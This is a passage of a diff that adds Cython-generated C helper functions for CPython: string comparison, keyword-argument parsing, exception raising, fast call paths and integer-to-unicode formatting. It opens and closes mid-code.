s2_is_unicode; + if (s1 == s2) { + goto return_eq; + } + s1_is_unicode = PyUnicode_CheckExact(s1); + s2_is_unicode = PyUnicode_CheckExact(s2); +#if PY_MAJOR_VERSION < 3 + if ((s1_is_unicode & (!s2_is_unicode)) && PyString_CheckExact(s2)) { + owned_ref = PyUnicode_FromObject(s2); + if (unlikely(!owned_ref)) + return -1; + s2 = owned_ref; + s2_is_unicode = 1; + } else if ((s2_is_unicode & (!s1_is_unicode)) && PyString_CheckExact(s1)) { + owned_ref = PyUnicode_FromObject(s1); + if (unlikely(!owned_ref)) + return -1; + s1 = owned_ref; + s1_is_unicode = 1; + } else if (((!s2_is_unicode) & (!s1_is_unicode))) { + return __Pyx_PyBytes_Equals(s1, s2, equals); + } +#endif + if (s1_is_unicode & s2_is_unicode) { + Py_ssize_t length; + int kind; + void *data1, *data2; + if (unlikely(__Pyx_PyUnicode_READY(s1) < 0) || unlikely(__Pyx_PyUnicode_READY(s2) < 0)) + return -1; + length = __Pyx_PyUnicode_GET_LENGTH(s1); + if (length != __Pyx_PyUnicode_GET_LENGTH(s2)) { + goto return_ne; + } +#if CYTHON_USE_UNICODE_INTERNALS + { + Py_hash_t hash1, hash2; + #if CYTHON_PEP393_ENABLED + hash1 = ((PyASCIIObject*)s1)->hash; + hash2 = ((PyASCIIObject*)s2)->hash; + #else + hash1 = ((PyUnicodeObject*)s1)->hash; + hash2 = ((PyUnicodeObject*)s2)->hash; + #endif + if (hash1 != hash2 && hash1 != -1 && hash2 != -1) { + goto return_ne; + } + } +#endif + kind = __Pyx_PyUnicode_KIND(s1); + if (kind != __Pyx_PyUnicode_KIND(s2)) { + goto return_ne; + } + data1 = __Pyx_PyUnicode_DATA(s1); + data2 = __Pyx_PyUnicode_DATA(s2); + if (__Pyx_PyUnicode_READ(kind, data1, 0) != __Pyx_PyUnicode_READ(kind, data2, 0)) { + goto return_ne; + } else if (length == 1) { + goto return_eq; + } else { + int result = memcmp(data1, data2, (size_t)(length * kind)); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ) ? (result == 0) : (result != 0); + } + } else if ((s1 == Py_None) & s2_is_unicode) { + goto return_ne; + } else if ((s2 == Py_None) & s1_is_unicode) { + goto return_ne; + } else { + int result; + PyObject* py_result = PyObject_RichCompare(s1, s2, equals); + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + if (!py_result) + return -1; + result = __Pyx_PyObject_IsTrue(py_result); + Py_DECREF(py_result); + return result; + } +return_eq: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_EQ); +return_ne: + #if PY_MAJOR_VERSION < 3 + Py_XDECREF(owned_ref); + #endif + return (equals == Py_NE); +#endif +} + +/* fastcall */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s) +{ + Py_ssize_t i, n = PyTuple_GET_SIZE(kwnames); + for (i = 0; i < n; i++) + { + if (s == PyTuple_GET_ITEM(kwnames, i)) return kwvalues[i]; + } + for (i = 0; i < n; i++) + { + int eq = __Pyx_PyUnicode_Equals(s, PyTuple_GET_ITEM(kwnames, i), Py_EQ); + if (unlikely(eq != 0)) { + if (unlikely(eq < 0)) return NULL; // error + return kwvalues[i]; + } + } + return NULL; // not found (no exception set) +} +#endif + +/* RaiseArgTupleInvalid */ +static void __Pyx_RaiseArgtupleInvalid( + const char* func_name, + int exact, + Py_ssize_t num_min, + Py_ssize_t num_max, + Py_ssize_t num_found) +{ + Py_ssize_t num_expected; + const char *more_or_less; + if (num_found < num_min) { + num_expected = num_min; + more_or_less = "at least"; + } else { + num_expected = num_max; + more_or_less = "at most"; + } + if (exact) { + more_or_less = "exactly"; + } + PyErr_Format(PyExc_TypeError, + "%.200s() takes %.8s %" CYTHON_FORMAT_SSIZE_T "d positional argument%.1s (%" CYTHON_FORMAT_SSIZE_T "d given)", + func_name, more_or_less, num_expected, + (num_expected == 1) ? "" : "s", num_found); +} + +/* RaiseDoubleKeywords */ +static void __Pyx_RaiseDoubleKeywordsError( + const char* func_name, + PyObject* kw_name) +{ + PyErr_Format(PyExc_TypeError, + #if PY_MAJOR_VERSION >= 3 + "%s() got multiple values for keyword argument '%U'", func_name, kw_name); + #else + "%s() got multiple values for keyword argument '%s'", func_name, + PyString_AsString(kw_name)); + #endif +} + +/* ParseKeywords */ +static int __Pyx_ParseOptionalKeywords( + PyObject *kwds, + PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, + PyObject *values[], + Py_ssize_t num_pos_args, + const char* function_name) +{ + PyObject *key = 0, *value = 0; + Py_ssize_t pos = 0; + PyObject*** name; + PyObject*** first_kw_arg = argnames + num_pos_args; + int kwds_is_tuple = CYTHON_METH_FASTCALL && likely(PyTuple_Check(kwds)); + while (1) { + if (kwds_is_tuple) { + if (pos >= PyTuple_GET_SIZE(kwds)) break; + key = PyTuple_GET_ITEM(kwds, pos); + value = kwvalues[pos]; + pos++; + } + else + { + if (!PyDict_Next(kwds, &pos, &key, &value)) break; + } + name = first_kw_arg; + while (*name && (**name != key)) name++; + if (*name) { + values[name-argnames] = value; + continue; + } + name = first_kw_arg; + #if PY_MAJOR_VERSION < 3 + if (likely(PyString_Check(key))) { + while (*name) { + if ((CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**name) == PyString_GET_SIZE(key)) + && _PyString_Eq(**name, key)) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + if ((**argname == key) || ( + (CYTHON_COMPILING_IN_PYPY || PyString_GET_SIZE(**argname) == PyString_GET_SIZE(key)) + && _PyString_Eq(**argname, key))) { + goto arg_passed_twice; + } + argname++; + } + } + } else + #endif + if (likely(PyUnicode_Check(key))) { + while (*name) { + int cmp = ( + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**name) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**name, key) + ); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) { + values[name-argnames] = value; + break; + } + name++; + } + if (*name) continue; + else { + PyObject*** argname = argnames; + while (argname != first_kw_arg) { + int cmp = (**argname == key) ? 0 : + #if !CYTHON_COMPILING_IN_PYPY && PY_MAJOR_VERSION >= 3 + (__Pyx_PyUnicode_GET_LENGTH(**argname) != __Pyx_PyUnicode_GET_LENGTH(key)) ? 1 : + #endif + PyUnicode_Compare(**argname, key); + if (cmp < 0 && unlikely(PyErr_Occurred())) goto bad; + if (cmp == 0) goto arg_passed_twice; + argname++; + } + } + } else + goto invalid_keyword_type; + if (kwds2) { + if (unlikely(PyDict_SetItem(kwds2, key, value))) goto bad; + } else { + goto invalid_keyword; + } + } + return 0; +arg_passed_twice: + __Pyx_RaiseDoubleKeywordsError(function_name, key); + goto bad; +invalid_keyword_type: + PyErr_Format(PyExc_TypeError, + "%.200s() keywords must be strings", function_name); + goto bad; +invalid_keyword: + #if PY_MAJOR_VERSION < 3 + PyErr_Format(PyExc_TypeError, + "%.200s() got an unexpected keyword argument '%.200s'", + function_name, PyString_AsString(key)); + #else + PyErr_Format(PyExc_TypeError, + "%s() got an unexpected keyword argument '%U'", + function_name, key); + #endif +bad: + return -1; +} + +/* ArgTypeTest */ +static int __Pyx__ArgTypeTest(PyObject *obj, PyTypeObject *type, const char *name, int exact) +{ + __Pyx_TypeName type_name; + __Pyx_TypeName obj_type_name; + if (unlikely(!type)) { + PyErr_SetString(PyExc_SystemError, "Missing type object"); + return 0; + } + else if (exact) { + #if PY_MAJOR_VERSION == 2 + if ((type == &PyBaseString_Type) && likely(__Pyx_PyBaseString_CheckExact(obj))) return 1; + #endif + } + else { + if (likely(__Pyx_TypeCheck(obj, type))) return 1; + } + type_name = __Pyx_PyType_GetName(type); + obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, + "Argument '%.200s' has incorrect type (expected " __Pyx_FMT_TYPENAME + ", got " __Pyx_FMT_TYPENAME ")", name, type_name, obj_type_name); + __Pyx_DECREF_TypeName(type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* RaiseException */ +#if PY_MAJOR_VERSION < 3 +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + __Pyx_PyThreadState_declare + CYTHON_UNUSED_VAR(cause); + Py_XINCREF(type); + if (!value || value == Py_None) + value = NULL; + else + Py_INCREF(value); + if (!tb || tb == Py_None) + tb = NULL; + else { + Py_INCREF(tb); + if (!PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto raise_error; + } + } + if (PyType_Check(type)) { +#if CYTHON_COMPILING_IN_PYPY + if (!value) { + Py_INCREF(Py_None); + value = Py_None; + } +#endif + PyErr_NormalizeException(&type, &value, &tb); + } else { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto raise_error; + } + value = type; + type = (PyObject*) Py_TYPE(type); + Py_INCREF(type); + if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto raise_error; + } + } + __Pyx_PyThreadState_assign + __Pyx_ErrRestore(type, value, tb); + return; +raise_error: + Py_XDECREF(value); + Py_XDECREF(type); + Py_XDECREF(tb); + return; +} +#else +static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { + PyObject* owned_instance = NULL; + if (tb == Py_None) { + tb = 0; + } else if (tb && !PyTraceBack_Check(tb)) { + PyErr_SetString(PyExc_TypeError, + "raise: arg 3 must be a traceback or None"); + goto bad; + } + if (value == Py_None) + value = 0; + if (PyExceptionInstance_Check(type)) { + if (value) { + PyErr_SetString(PyExc_TypeError, + "instance exception may not have a separate value"); + goto bad; + } + value = type; + type = (PyObject*) Py_TYPE(value); + } else if (PyExceptionClass_Check(type)) { + PyObject *instance_class = NULL; + if (value && PyExceptionInstance_Check(value)) { + instance_class = (PyObject*) Py_TYPE(value); + if (instance_class != type) { + int is_subclass = PyObject_IsSubclass(instance_class, type); + if (!is_subclass) { + instance_class = NULL; + } else if (unlikely(is_subclass == -1)) { + goto bad; + } else { + type = instance_class; + } + } + } + if (!instance_class) { + PyObject *args; + if (!value) + args = PyTuple_New(0); + else if (PyTuple_Check(value)) { + Py_INCREF(value); + args = value; + } else + args = PyTuple_Pack(1, value); + if (!args) + goto bad; + owned_instance = PyObject_Call(type, args, NULL); + Py_DECREF(args); + if (!owned_instance) + goto bad; + value = owned_instance; + if (!PyExceptionInstance_Check(value)) { + PyErr_Format(PyExc_TypeError, + "calling %R should have returned an instance of " + "BaseException, not %R", + type, Py_TYPE(value)); + goto bad; + } + } + } else { + PyErr_SetString(PyExc_TypeError, + "raise: exception class must be a subclass of BaseException"); + goto bad; + } + if (cause) { + PyObject *fixed_cause; + if (cause == Py_None) { + fixed_cause = NULL; + } else if (PyExceptionClass_Check(cause)) { + fixed_cause = PyObject_CallObject(cause, NULL); + if (fixed_cause == NULL) + goto bad; + } else if (PyExceptionInstance_Check(cause)) { + fixed_cause = cause; + Py_INCREF(fixed_cause); + } else { + PyErr_SetString(PyExc_TypeError, + "exception causes must derive from " + "BaseException"); + goto bad; + } + PyException_SetCause(value, fixed_cause); + } + PyErr_SetObject(type, value); + if (tb) { + #if PY_VERSION_HEX >= 0x030C00A6 + PyException_SetTraceback(value, tb); + #elif CYTHON_FAST_THREAD_STATE + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject* tmp_tb = tstate->curexc_traceback; + if (tb != tmp_tb) { + Py_INCREF(tb); + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_tb); + } +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); + Py_INCREF(tb); + PyErr_Restore(tmp_type, tmp_value, tb); + Py_XDECREF(tmp_tb); +#endif + } +bad: + Py_XDECREF(owned_instance); + return; +} +#endif + +/* PyFunctionFastCall */ +#if CYTHON_FAST_PYCALL && !CYTHON_VECTORCALL +static PyObject* __Pyx_PyFunction_FastCallNoKw(PyCodeObject *co, PyObject **args, Py_ssize_t na, + PyObject *globals) { + PyFrameObject *f; + PyThreadState *tstate = __Pyx_PyThreadState_Current; + PyObject **fastlocals; + Py_ssize_t i; + PyObject *result; + assert(globals != NULL); + /* XXX Perhaps we should create a specialized + PyFrame_New() that doesn't take locals, but does + take builtins without sanity checking them. + */ + assert(tstate != NULL); + f = PyFrame_New(tstate, co, globals, NULL); + if (f == NULL) { + return NULL; + } + fastlocals = __Pyx_PyFrame_GetLocalsplus(f); + for (i = 0; i < na; i++) { + Py_INCREF(*args); + fastlocals[i] = *args++; + } + result = PyEval_EvalFrameEx(f,0); + ++tstate->recursion_depth; + Py_DECREF(f); + --tstate->recursion_depth; + return result; +} +static PyObject *__Pyx_PyFunction_FastCallDict(PyObject *func, PyObject **args, Py_ssize_t nargs, PyObject *kwargs) { + PyCodeObject *co = (PyCodeObject *)PyFunction_GET_CODE(func); + PyObject *globals = PyFunction_GET_GLOBALS(func); + PyObject *argdefs = PyFunction_GET_DEFAULTS(func); + PyObject *closure; +#if PY_MAJOR_VERSION >= 3 + PyObject *kwdefs; +#endif + PyObject *kwtuple, **k; + PyObject **d; + Py_ssize_t nd; + Py_ssize_t nk; + PyObject *result; + assert(kwargs == NULL || PyDict_Check(kwargs)); + nk = kwargs ? PyDict_Size(kwargs) : 0; + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) { + return NULL; + } + if ( +#if PY_MAJOR_VERSION >= 3 + co->co_kwonlyargcount == 0 && +#endif + likely(kwargs == NULL || nk == 0) && + co->co_flags == (CO_OPTIMIZED | CO_NEWLOCALS | CO_NOFREE)) { + if (argdefs == NULL && co->co_argcount == nargs) { + result = __Pyx_PyFunction_FastCallNoKw(co, args, nargs, globals); + goto done; + } + else if (nargs == 0 && argdefs != NULL + && co->co_argcount == Py_SIZE(argdefs)) { + /* function called with no arguments, but all parameters have + a default value: use default values as arguments .*/ + args = &PyTuple_GET_ITEM(argdefs, 0); + result =__Pyx_PyFunction_FastCallNoKw(co, args, Py_SIZE(argdefs), globals); + goto done; + } + } + if (kwargs != NULL) { + Py_ssize_t pos, i; + kwtuple = PyTuple_New(2 * nk); + if (kwtuple == NULL) { + result = NULL; + goto done; + } + k = &PyTuple_GET_ITEM(kwtuple, 0); + pos = i = 0; + while (PyDict_Next(kwargs, &pos, &k[i], &k[i+1])) { + Py_INCREF(k[i]); + Py_INCREF(k[i+1]); + i += 2; + } + nk = i / 2; + } + else { + kwtuple = NULL; + k = NULL; + } + closure = PyFunction_GET_CLOSURE(func); +#if PY_MAJOR_VERSION >= 3 + kwdefs = PyFunction_GET_KW_DEFAULTS(func); +#endif + if (argdefs != NULL) { + d = &PyTuple_GET_ITEM(argdefs, 0); + nd = Py_SIZE(argdefs); + } + else { + d = NULL; + nd = 0; + } +#if PY_MAJOR_VERSION >= 3 + result = PyEval_EvalCodeEx((PyObject*)co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, kwdefs, closure); +#else + result = PyEval_EvalCodeEx(co, globals, (PyObject *)NULL, + args, (int)nargs, + k, (int)nk, + d, (int)nd, closure); +#endif + Py_XDECREF(kwtuple); +done: + Py_LeaveRecursiveCall(); + return result; +} +#endif + +/* PyObjectCall */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_Call(PyObject *func, PyObject *arg, PyObject *kw) { + PyObject *result; + ternaryfunc call = Py_TYPE(func)->tp_call; + if (unlikely(!call)) + return PyObject_Call(func, arg, kw); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = (*call)(func, arg, kw); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectCallMethO */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyObject_CallMethO(PyObject *func, PyObject *arg) { + PyObject *self, *result; + PyCFunction cfunc; + cfunc = PyCFunction_GET_FUNCTION(func); + self = PyCFunction_GET_SELF(func); + if (unlikely(Py_EnterRecursiveCall((char*)" while calling a Python object"))) + return NULL; + result = cfunc(self, arg); + Py_LeaveRecursiveCall(); + if (unlikely(!result) && unlikely(!PyErr_Occurred())) { + PyErr_SetString( + PyExc_SystemError, + "NULL result without error in PyObject_Call"); + } + return result; +} +#endif + +/* PyObjectFastCall */ +static PyObject* __Pyx_PyObject_FastCall_fallback(PyObject *func, PyObject **args, size_t nargs, PyObject *kwargs) { + PyObject *argstuple; + PyObject *result; + size_t i; + argstuple = PyTuple_New((Py_ssize_t)nargs); + if (unlikely(!argstuple)) return NULL; + for (i = 0; i < nargs; i++) { + Py_INCREF(args[i]); + PyTuple_SET_ITEM(argstuple, (Py_ssize_t)i, args[i]); + } + result = __Pyx_PyObject_Call(func, argstuple, kwargs); + Py_DECREF(argstuple); + return result; +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_FastCallDict(PyObject *func, PyObject **args, size_t _nargs, PyObject *kwargs) { + Py_ssize_t nargs = __Pyx_PyVectorcall_NARGS(_nargs); +#if CYTHON_COMPILING_IN_CPYTHON + if (nargs == 0 && kwargs == NULL) { +#if defined(__Pyx_CyFunction_USED) && defined(NDEBUG) + if (__Pyx_IsCyOrPyCFunction(func)) +#else + if (PyCFunction_Check(func)) +#endif + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_NOARGS)) { + return __Pyx_PyObject_CallMethO(func, NULL); + } + } + } + else if (nargs == 1 && kwargs == NULL) { + if (PyCFunction_Check(func)) + { + if (likely(PyCFunction_GET_FLAGS(func) & METH_O)) { + return __Pyx_PyObject_CallMethO(func, args[0]); + } + } + } +#endif + #if PY_VERSION_HEX < 0x030800B1 + #if CYTHON_FAST_PYCCALL + if (PyCFunction_Check(func)) { + if (kwargs) { + return _PyCFunction_FastCallDict(func, args, nargs, kwargs); + } else { + return _PyCFunction_FastCallKeywords(func, args, nargs, NULL); + } + } + #if PY_VERSION_HEX >= 0x030700A1 + if (!kwargs && __Pyx_IS_TYPE(func, &PyMethodDescr_Type)) { + return _PyMethodDescr_FastCallKeywords(func, args, nargs, NULL); + } + #endif + #endif + #if CYTHON_FAST_PYCALL + if (PyFunction_Check(func)) { + return __Pyx_PyFunction_FastCallDict(func, args, nargs, kwargs); + } + #endif + #endif + #if CYTHON_VECTORCALL + vectorcallfunc f = _PyVectorcall_Function(func); + if (f) { + return f(func, args, (size_t)nargs, kwargs); + } + #elif defined(__Pyx_CyFunction_USED) && CYTHON_BACKPORT_VECTORCALL + if (__Pyx_CyFunction_CheckExact(func)) { + __pyx_vectorcallfunc f = __Pyx_CyFunction_func_vectorcall(func); + if (f) return f(func, args, (size_t)nargs, kwargs); + } + #endif + if (nargs == 0) { + return __Pyx_PyObject_Call(func, __pyx_empty_tuple, kwargs); + } + return __Pyx_PyObject_FastCall_fallback(func, args, (size_t)nargs, kwargs); +} + +/* RaiseUnexpectedTypeError */ +static int +__Pyx_RaiseUnexpectedTypeError(const char *expected, PyObject *obj) +{ + __Pyx_TypeName obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); + PyErr_Format(PyExc_TypeError, "Expected %s, got " __Pyx_FMT_TYPENAME, + expected, obj_type_name); + __Pyx_DECREF_TypeName(obj_type_name); + return 0; +} + +/* CIntToDigits */ +static const char DIGIT_PAIRS_10[2*10*10+1] = { + "00010203040506070809" + "10111213141516171819" + "20212223242526272829" + "30313233343536373839" + "40414243444546474849" + "50515253545556575859" + "60616263646566676869" + "70717273747576777879" + "80818283848586878889" + "90919293949596979899" +}; +static const char DIGIT_PAIRS_8[2*8*8+1] = { + "0001020304050607" + "1011121314151617" + "2021222324252627" + "3031323334353637" + "4041424344454647" + "5051525354555657" + "6061626364656667" + "7071727374757677" +}; +static const char DIGITS_HEX[2*16+1] = { + "0123456789abcdef" + "0123456789ABCDEF" +}; + +/* BuildPyUnicode */ +static PyObject* __Pyx_PyUnicode_BuildFromAscii(Py_ssize_t ulength, char* chars, int clength, + int prepend_sign, char padding_char) { + PyObject *uval; + Py_ssize_t uoffset = ulength - clength; +#if CYTHON_USE_UNICODE_INTERNALS + Py_ssize_t i; +#if CYTHON_PEP393_ENABLED + void *udata; + uval = PyUnicode_New(ulength, 127); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_DATA(uval); +#else + Py_UNICODE *udata; + uval = PyUnicode_FromUnicode(NULL, ulength); + if (unlikely(!uval)) return NULL; + udata = PyUnicode_AS_UNICODE(uval); +#endif + if (uoffset > 0) { + i = 0; + if (prepend_sign) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, 0, '-'); + i++; + } + for (; i < uoffset; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, i, padding_char); + } + } + for (i=0; i < clength; i++) { + __Pyx_PyUnicode_WRITE(PyUnicode_1BYTE_KIND, udata, uoffset+i, chars[i]); + } +#else + { + PyObject *sign = NULL, *padding = NULL; + uval = NULL; + if (uoffset > 0) { + prepend_sign = !!prepend_sign; + if (uoffset > prepend_sign) { + padding = PyUnicode_FromOrdinal(padding_char); + if (likely(padding) && uoffset > prepend_sign + 1) { + PyObject *tmp; + PyObject *repeat = PyInt_FromSsize_t(uoffset - prepend_sign); + if (unlikely(!repeat)) goto done_or_error; + tmp = PyNumber_Multiply(padding, repeat); + Py_DECREF(repeat); + Py_DECREF(padding); + padding = tmp; + } + if (unlikely(!padding)) goto done_or_error; + } + if (prepend_sign) { + sign = PyUnicode_FromOrdinal('-'); + if (unlikely(!sign)) goto done_or_error; + } + } + uval = PyUnicode_DecodeASCII(chars, clength, NULL); + if (likely(uval) && padding) { + PyObject *tmp = PyNumber_Add(padding, uval); + Py_DECREF(uval); + uval = tmp; + } + if (likely(uval) && sign) { + PyObject *tmp = PyNumber_Add(sign, uval); + Py_DECREF(uval); + uval = tmp; + } +done_or_error: + Py_XDECREF(padding); + Py_XDECREF(sign); + } +#endif + return uval; +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_int(int value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(int)*3+2]; + char *dpos, *end = digits + sizeof(int)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + int remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const int neg_one = (int) -1, const_zero = (int) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (int) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (int) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (int) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* CIntToPyUnicode */ +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_From_Py_ssize_t(Py_ssize_t value, Py_ssize_t width, char padding_char, char format_char) { + char digits[sizeof(Py_ssize_t)*3+2]; + char *dpos, *end = digits + sizeof(Py_ssize_t)*3+2; + const char *hex_digits = DIGITS_HEX; + Py_ssize_t length, ulength; + int prepend_sign, last_one_off; + Py_ssize_t remaining; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wconversion" +#endif + const Py_ssize_t neg_one = (Py_ssize_t) -1, const_zero = (Py_ssize_t) 0; +#ifdef __Pyx_HAS_GCC_DIAGNOSTIC +#pragma GCC diagnostic pop +#endif + const int is_unsigned = neg_one > const_zero; + if (format_char == 'X') { + hex_digits += 16; + format_char = 'x'; + } + remaining = value; + last_one_off = 0; + dpos = end; + do { + int digit_pos; + switch (format_char) { + case 'o': + digit_pos = abs((int)(remaining % (8*8))); + remaining = (Py_ssize_t) (remaining / (8*8)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_8 + digit_pos * 2, 2); + last_one_off = (digit_pos < 8); + break; + case 'd': + digit_pos = abs((int)(remaining % (10*10))); + remaining = (Py_ssize_t) (remaining / (10*10)); + dpos -= 2; + memcpy(dpos, DIGIT_PAIRS_10 + digit_pos * 2, 2); + last_one_off = (digit_pos < 10); + break; + case 'x': + *(--dpos) = hex_digits[abs((int)(remaining % 16))]; + remaining = (Py_ssize_t) (remaining / 16); + break; + default: + assert(0); + break; + } + } while (unlikely(remaining != 0)); + assert(!last_one_off || *dpos == '0'); + dpos += last_one_off; + length = end - dpos; + ulength = length; + prepend_sign = 0; + if (!is_unsigned && value <= neg_one) { + if (padding_char == ' ' || width <= length + 1) { + *(--dpos) = '-'; + ++length; + } else { + prepend_sign = 1; + } + ++ulength; + } + if (width > ulength) { + ulength = width; + } + if (ulength == 1) { + return PyUnicode_FromOrdinal(*dpos); + } + return __Pyx_PyUnicode_BuildFromAscii(ulength, dpos, (int) length, prepend_sign, padding_char); +} + +/* JoinPyUnicode */ +static PyObject* __Pyx_PyUnicode_Join(PyObject* value_tuple, Py_ssize_t value_count, Py_ssize_t result_ulength, + Py_UCS4 max_char) { +#if CYTHON_USE_UNICODE_INTERNALS && CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + PyObject *result_uval; + int result_ukind, kind_shift; + Py_ssize_t i, char_pos; + void *result_udata; + CYTHON_MAYBE_UNUSED_VAR(max_char); +#if CYTHON_PEP393_ENABLED + result_uval = PyUnicode_New(result_ulength, max_char); + if (unlikely(!result_uval)) return NULL; + result_ukind = (max_char <= 255) ? PyUnicode_1BYTE_KIND : (max_char <= 65535) ? PyUnicode_2BYTE_KIND : PyUnicode_4BYTE_KIND; + kind_shift = (result_ukind == PyUnicode_4BYTE_KIND) ? 2 : result_ukind - 1; + result_udata = PyUnicode_DATA(result_uval); +#else + result_uval = PyUnicode_FromUnicode(NULL, result_ulength); + if (unlikely(!result_uval)) return NULL; + result_ukind = sizeof(Py_UNICODE); + kind_shift = (result_ukind == 4) ? 2 : result_ukind - 1; + result_udata = PyUnicode_AS_UNICODE(result_uval); +#endif + assert(kind_shift == 2 || kind_shift == 1 || kind_shift == 0); + char_pos = 0; + for (i=0; i < value_count; i++) { + int ukind; + Py_ssize_t ulength; + void *udata; + PyObject *uval = PyTuple_GET_ITEM(value_tuple, i); + if (unlikely(__Pyx_PyUnicode_READY(uval))) + goto bad; + ulength = __Pyx_PyUnicode_GET_LENGTH(uval); + if (unlikely(!ulength)) + continue; + if (unlikely((PY_SSIZE_T_MAX >> kind_shift) - ulength < char_pos)) + goto overflow; + ukind = __Pyx_PyUnicode_KIND(uval); + udata = __Pyx_PyUnicode_DATA(uval); + if (!CYTHON_PEP393_ENABLED || ukind == result_ukind) { + memcpy((char *)result_udata + (char_pos << kind_shift), udata, (size_t) (ulength << kind_shift)); + } else { + #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x030300F0 || defined(_PyUnicode_FastCopyCharacters) + _PyUnicode_FastCopyCharacters(result_uval, char_pos, uval, 0, ulength); + #else + Py_ssize_t j; + for (j=0; j < ulength; j++) { + Py_UCS4 uchar = __Pyx_PyUnicode_READ(ukind, udata, j); + __Pyx_PyUnicode_WRITE(result_ukind, result_udata, char_pos+j, uchar); + } + #endif + } + char_pos += ulength; + } + return result_uval; +overflow: + PyErr_SetString(PyExc_OverflowError, "join() result is too long for a Python string"); +bad: + Py_DECREF(result_uval); + return NULL; +#else + CYTHON_UNUSED_VAR(max_char); + CYTHON_UNUSED_VAR(result_ulength); + CYTHON_UNUSED_VAR(value_count); + return PyUnicode_Join(__pyx_empty_unicode, value_tuple); +#endif +} + +/* GetAttr */ +static CYTHON_INLINE PyObject *__Pyx_GetAttr(PyObject *o, PyObject *n) { +#if CYTHON_USE_TYPE_SLOTS +#if PY_MAJOR_VERSION >= 3 + if (likely(PyUnicode_Check(n))) +#else + if (likely(PyString_Check(n))) +#endif + return __Pyx_PyObject_GetAttrStr(o, n); +#endif + return PyObject_GetAttr(o, n); +} + +/* 